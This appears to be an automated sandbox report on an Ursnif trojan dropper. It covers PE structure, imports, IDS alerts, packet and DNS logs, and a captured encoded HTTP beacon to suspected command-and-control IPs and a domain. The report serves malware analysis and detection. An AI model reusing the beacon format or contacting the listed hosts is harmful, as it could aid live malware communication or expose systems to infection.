| .text | 0x1000 | 0x7b80 | 0x7c00 | False | 0.5499936995967742 | data | 6.096261782871538 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x9000 | 0x22c8 | 0x2400 | False | 0.4136284722222222 | data | 4.727841929207054 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xc000 | 0x1f00 | 0x400 | False | 0.3212890625 | data | 3.1889769845125677 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .pdata | 0xe000 | 0x408 | 0x600 | False | 0.3932291666666667 | data | 3.1563665040475675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0xf000 | 0xb2090 | 0xb2200 | False | 0.20762061403508772 | data | 3.7870907515214767 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xc2000 | 0x20 | 0x200 | False | 0.083984375 | data | 0.4068473715812382 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| AVI | 0xf878 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States |
| RT_ICON | 0x12694 | 0x4325 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
| RT_ICON | 0x169bc | 0x2868 | Device independent bitmap graphic, 128 x 256 x 4, image size 0 | English | United States |
| RT_ICON | 0x19224 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | English | United States |
| RT_ICON | 0x1988c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States |
| RT_ICON | 0x19b74 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 0 | English | United States |
| RT_ICON | 0x19d5c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States |
| RT_ICON | 0x19e84 | 0x825f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
| RT_ICON | 0x220e4 | 0x4c28 | Device independent bitmap graphic, 128 x 256 x 8, image size 0 | English | United States |
| RT_ICON | 0x26d0c | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States |
| RT_ICON | 0x27bb4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States |
| RT_ICON | 0x2845c | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | English | United States |
| RT_ICON | 0x28b24 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States |
| RT_ICON | 0x2908c | 0xa3d4 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
| RT_ICON | 0x33460 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States |
| RT_ICON | 0x43c88 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States |
| RT_ICON | 0x46230 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States |
| RT_ICON | 0x472d8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | English | United States |
| RT_ICON | 0x47c60 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States |
| RT_RCDATA | 0x480c8 | 0x7 | ASCII text, with no line terminators | English | United States |
| RT_RCDATA | 0x480d0 | 0x78916 | Microsoft Cabinet archive data, Windows 2000/XP setup, 493846 bytes, 1 file, at 0x2c +A "maintainabovl.exe", ID 1749, number 1, 11597 datablocks, 0x1503 compression | English | United States |
| RT_RCDATA | 0xc09e8 | 0x4 | data | English | United States |
| RT_RCDATA | 0xc09ec | 0x24 | data | English | United States |
| RT_RCDATA | 0xc0a10 | 0x7 | ASCII text, with no line terminators | English | United States |
| RT_RCDATA | 0xc0a18 | 0x7 | ASCII text, with no line terminators | English | United States |
| RT_RCDATA | 0xc0a20 | 0x4 | data | English | United States |
| RT_RCDATA | 0xc0a24 | 0x7 | ASCII text, with no line terminators | English | United States |
| RT_RCDATA | 0xc0a2c | 0x4 | data | English | United States |
| RT_RCDATA | 0xc0a30 | 0x12 | data | English | United States |
| RT_RCDATA | 0xc0a44 | 0x4 | data | English | United States |
| RT_RCDATA | 0xc0a48 | 0x8 | data | English | United States |
| RT_RCDATA | 0xc0a50 | 0x7 | ASCII text, with no line terminators | English | United States |
| RT_RCDATA | 0xc0a58 | 0x7 | ASCII text, with no line terminators | English | United States |
| RT_GROUP_ICON | 0xc0a60 | 0x102 | data | English | United States |
| RT_VERSION | 0xc0b64 | 0x34c | data | English | United States |
| RT_MANIFEST | 0xc0eb0 | 0x1e0 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States |
| DLL | Import |
|---|---|
| ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges |
| KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose |
| GDI32.dll | GetDeviceCaps |
| USER32.dll | ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA |
| msvcrt.dll | ?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy |
| COMCTL32.dll | |
| Cabinet.dll | |
| VERSION.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |
| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 01/12/23-12:14:18.009455 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49696 | 80 | 192.168.2.4 | 62.173.149.202 |
| 01/12/23-12:14:18.009455 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49696 | 80 | 192.168.2.4 | 62.173.149.202 |
| 01/12/23-12:14:38.185535 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49697 | 80 | 192.168.2.4 | 31.41.44.158 |
| 01/12/23-12:14:38.185535 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49697 | 80 | 192.168.2.4 | 31.41.44.158 |
| 01/12/23-12:14:58.327920 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49698 | 80 | 192.168.2.4 | 193.0.178.157 |
Timestamp / Source Port / Dest Port / Source IP / Dest IP
                                                  Jan 12, 2023 12:11:41.554433107 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.554454088 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.554508924 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.554508924 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.554779053 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.554827929 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.554879904 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.554904938 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.554927111 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.554966927 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.555217028 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.555263996 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.555313110 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.555336952 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.555360079 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.555396080 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.664236069 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.664319038 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.664585114 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.664588928 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.664639950 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.664719105 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.664738894 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.664828062 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.664844990 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.664921045 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.665083885 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.665131092 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.665180922 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.665199041 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.665258884 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.665292978 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.665647984 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.665781975 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.666481972 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.666610956 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.666821003 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.666928053 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.666929960 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.666986942 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.667017937 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.667066097 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.667201996 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.667304039 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.667340040 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.667360067 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.667409897 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.667447090 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.667550087 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.667638063 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.667649984 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.667692900 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.667726040 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.667754889 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.667874098 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.667967081 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.667979956 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.668024063 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.668061972 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.668108940 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.668164968 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.668250084 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.668265104 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.668309927 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.668339014 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.668404102 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.668656111 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.668705940 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.668797016 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.668816090 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.668867111 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.668914080 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.668994904 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.669090033 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.669110060 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.669194937 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.669219017 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.669316053 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.669863939 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.669926882 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.669982910 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.670001984 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.670068979 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.670104027 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.670154095 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.670243979 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.670526028 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.670547962 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.670630932 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.670728922 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.670749903 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.670802116 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.670866013 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.671228886 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.671278954 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.671323061 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.671344042 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.671374083 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.671421051 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.671539068 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.671747923 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.671793938 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.671818018 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.671838999 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.671854973 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.671876907 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.671912909 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.672184944 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.672226906 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.672276974 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.672293901 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.672318935 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.672352076 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.672382116 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.672616959 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.672718048 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.672760010 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.673356056 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.673449039 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.673630953 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.673682928 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.673716068 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.673738956 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.673768044 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.673789978 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.673839092 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.673885107 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.673922062 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.673938990 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.673974037 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.673989058 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.674079895 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.674140930 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.674164057 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.674180984 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.674215078 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.674232006 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.674273014 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.674314976 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.674359083 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.674379110 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.674401045 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.674439907 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.674468994 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.674510956 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.674550056 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.674571037 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.674592018 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.674623966 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.783582926 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.783652067 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.783799887 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.783864021 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.783902884 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.783905029 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.783973932 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.783982038 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.784018993 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.784065008 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.784092903 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.784488916 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.784540892 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.784594059 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.784621954 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.784648895 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.784668922 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.784789085 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.784857035 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.784873962 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.784919977 CET44349695174.142.60.54192.168.2.4
                                                  Jan 12, 2023 12:11:41.788465023 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:11:41.799472094 CET49695443192.168.2.4174.142.60.54
                                                  Jan 12, 2023 12:14:17.946495056 CET4969680192.168.2.462.173.149.202
                                                  Jan 12, 2023 12:14:18.008944988 CET804969662.173.149.202192.168.2.4
                                                  Jan 12, 2023 12:14:18.009084940 CET4969680192.168.2.462.173.149.202
                                                  Jan 12, 2023 12:14:18.009454966 CET4969680192.168.2.462.173.149.202
                                                  Jan 12, 2023 12:14:18.071727991 CET804969662.173.149.202192.168.2.4
                                                  Jan 12, 2023 12:14:18.072314024 CET804969662.173.149.202192.168.2.4
                                                  Jan 12, 2023 12:14:18.072504997 CET4969680192.168.2.462.173.149.202
                                                  Jan 12, 2023 12:14:18.073934078 CET4969680192.168.2.462.173.149.202
                                                  Jan 12, 2023 12:14:18.136224985 CET804969662.173.149.202192.168.2.4
                                                  Jan 12, 2023 12:14:38.122783899 CET4969780192.168.2.431.41.44.158
                                                  Jan 12, 2023 12:14:38.183175087 CET804969731.41.44.158192.168.2.4
                                                  Jan 12, 2023 12:14:38.185137987 CET4969780192.168.2.431.41.44.158
                                                  Jan 12, 2023 12:14:38.185534954 CET4969780192.168.2.431.41.44.158
                                                  Jan 12, 2023 12:14:38.246366024 CET804969731.41.44.158192.168.2.4
                                                  Jan 12, 2023 12:14:38.246897936 CET804969731.41.44.158192.168.2.4
                                                  Jan 12, 2023 12:14:38.248133898 CET4969780192.168.2.431.41.44.158
                                                  Jan 12, 2023 12:14:38.251274109 CET4969780192.168.2.431.41.44.158
                                                  Jan 12, 2023 12:14:38.310674906 CET804969731.41.44.158192.168.2.4
                                                  Jan 12, 2023 12:14:58.298347950 CET4969880192.168.2.4193.0.178.157
                                                  Jan 12, 2023 12:14:58.327349901 CET8049698193.0.178.157192.168.2.4
                                                  Jan 12, 2023 12:14:58.327543974 CET4969880192.168.2.4193.0.178.157
                                                  Jan 12, 2023 12:14:58.327919960 CET4969880192.168.2.4193.0.178.157
                                                  Jan 12, 2023 12:14:58.356693983 CET8049698193.0.178.157192.168.2.4
                                                  Jan 12, 2023 12:14:58.357887030 CET8049698193.0.178.157192.168.2.4
                                                  Jan 12, 2023 12:14:58.359273911 CET4969880192.168.2.4193.0.178.157
                                                  Jan 12, 2023 12:14:58.359273911 CET4969880192.168.2.4193.0.178.157
                                                  Jan 12, 2023 12:14:58.664300919 CET4969880192.168.2.4193.0.178.157
                                                  Jan 12, 2023 12:14:58.693433046 CET8049698193.0.178.157192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 12, 2023 12:11:40.489515066 CET | 56572 | 53 | 192.168.2.4 | 8.8.8.8
Jan 12, 2023 12:11:40.509084940 CET | 53 | 56572 | 8.8.8.8 | 192.168.2.4
Jan 12, 2023 12:12:57.817224979 CET | 50911 | 53 | 192.168.2.4 | 8.8.8.8
Jan 12, 2023 12:12:57.837538004 CET | 53 | 50911 | 8.8.8.8 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 12, 2023 12:11:40.489515066 CET | 192.168.2.4 | 8.8.8.8 | 0x80b | Standard query (0) | christianbeltran.co | A (IP address) | IN (0x0001) | false
Jan 12, 2023 12:12:57.817224979 CET | 192.168.2.4 | 8.8.8.8 | 0xa002 | Standard query (0) | checklist.skype.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 12, 2023 12:11:40.509084940 CET | 8.8.8.8 | 192.168.2.4 | 0x80b | No error (0) | christianbeltran.co | (none) | 174.142.60.54 | A (IP address) | IN (0x0001) | false
Jan 12, 2023 12:12:57.837538004 CET | 8.8.8.8 | 192.168.2.4 | 0xa002 | Name error (3) | checklist.skype.com | none | none | A (IP address) | IN (0x0001) | false
                                                  • christianbeltran.co
                                                  • 62.173.149.202
                                                  • 31.41.44.158
                                                  • 193.0.178.157
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49695 | 174.142.60.54 | 443 | C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49696 | 62.173.149.202 | 80 | C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
Timestamp | kBytes transferred | Direction | Data
Jan 12, 2023 12:14:18.009454966 CET | 925 | OUT | GET /drew/jHChKd_2FjBQ0IhBZb/5eUb4wlnJ/nNAqLlhkhlVL_2BEMNaO/fU1yD2cllcbT9iHTfpI/6H3bbK1eyqLaqlIY2TE5OB/0EJzuQaexEZcX/7fNH93_2/BPaD_2BE_2FjENdy4RFw7Ax/5wIB2h5UN_/2FRQ47MCK2MIF7ewb/8_2Fu3XthbQR/CPx2qHatKTD/YHT_2FrDgK83SJ/t3nFbWzQ9PsSm_2Fb3E2u/XDf1ma0rrcvNnpl1/ThfvvL6MGjuAWJC/PiXEIoZrVwPJmdlxug/dGZn9wbLf/wg1whEjmB/85umsLkj4az/T.jlk HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: 62.173.149.202
  Connection: Keep-Alive
  Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49697 | 31.41.44.158 | 80 | C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
Timestamp | kBytes transferred | Direction | Data
